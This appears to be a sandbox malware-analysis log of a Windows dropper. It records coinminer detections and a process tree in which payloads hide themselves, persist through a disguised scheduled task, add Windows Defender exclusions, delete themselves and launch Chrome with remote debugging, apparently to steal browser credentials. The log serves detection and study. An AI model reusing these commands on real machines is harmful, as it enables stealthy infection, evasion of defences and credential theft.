                      Source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                      Source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                      Source: random[4].exe0.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: fcd2b0e3cd.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic PE information: Section: ZLIB complexity 0.9983981181880109
                      Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9983981181880109
                      Source: random[3].exe.5.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                      Source: random[3].exe.5.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                      Source: 964c9facda.exe.5.drStatic PE information: Section: ZLIB complexity 0.9973445526541096
                      Source: 964c9facda.exe.5.drStatic PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
                      Source: random[3].exe0.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: random[3].exe0.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: 164919d456.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: 164919d456.exe.5.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                      Source: random[4].exe1.5.drStatic PE information: Section: odlbdsvw ZLIB complexity 0.9941197065248027
                      Source: random[1].exe1.5.drStatic PE information: Section: hdwdyvma ZLIB complexity 0.9944403456998314
                      Source: 9c2981f3e5.exe.5.drStatic PE information: Section: hdwdyvma ZLIB complexity 0.9944403456998314
                      Source: d7884c562e.exe.5.drStatic PE information: Section: odlbdsvw ZLIB complexity 0.9941197065248027
                      Source: random[1].exe2.5.drStatic PE information: Section: mptavxer ZLIB complexity 0.9899758557225258
                      Source: 0577f55121.exe.5.drStatic PE information: Section: mptavxer ZLIB complexity 0.9899758557225258
                      Source: random[2].exe0.5.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                      Source: random[2].exe0.5.drStatic PE information: Section: ztykcjub ZLIB complexity 0.9944891402410934
                      Source: 77594b3442.exe.5.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                      Source: 77594b3442.exe.5.drStatic PE information: Section: ztykcjub ZLIB complexity 0.9944891402410934
                      Source: random[2].exe1.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: ce29828af5.exe.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                      Source: random[1].exe0.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: random[1].exe0.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 4268204ace.exe.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 4268204ace.exe.5.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 5119130eb96345a8a13dc770d0f33571.exe.15.dr, PayloadExtensions.csSuspicious method names: .PayloadExtensions.GetArchitectureMinimum
                      Source: 15.2.4268204ace.exe.3ce09a0.1.raw.unpack, PayloadExtensions.csSuspicious method names: .PayloadExtensions.GetArchitectureMinimum
                      Source: 5119130eb96345a8a13dc770d0f33571.exe.15.dr, PayloadV1.csSuspicious method names: .PayloadV1.Validate
                      Source: 15.2.4268204ace.exe.3ce09a0.1.raw.unpack, PayloadV1.csSuspicious method names: .PayloadV1.Validate
                      Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@132/124@0/23
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DAC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_001DAC74
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001E1D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,11_2_001E1D04
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_001DABB0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wNFfgZ1[1].htmJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:740:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_03
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f6bec8ba-58ff-4dfc-9981-2ec5ebd23734}-9MSZ40SLW145
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 77594b3442.exe, 00000031.00000003.2942066458.00000000052BE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2941443139.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, 513dad5c05.exe, 00000038.00000003.3202224956.0000000005608000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | Virustotal: Detection: 55%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe | String found in binary or memory: WRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeW
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe "C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe"
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe"
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe "C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe"
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe"
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Process created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe "C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe "C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe "C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe "C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe"
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess created: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe "C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess created: unknown unknown
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
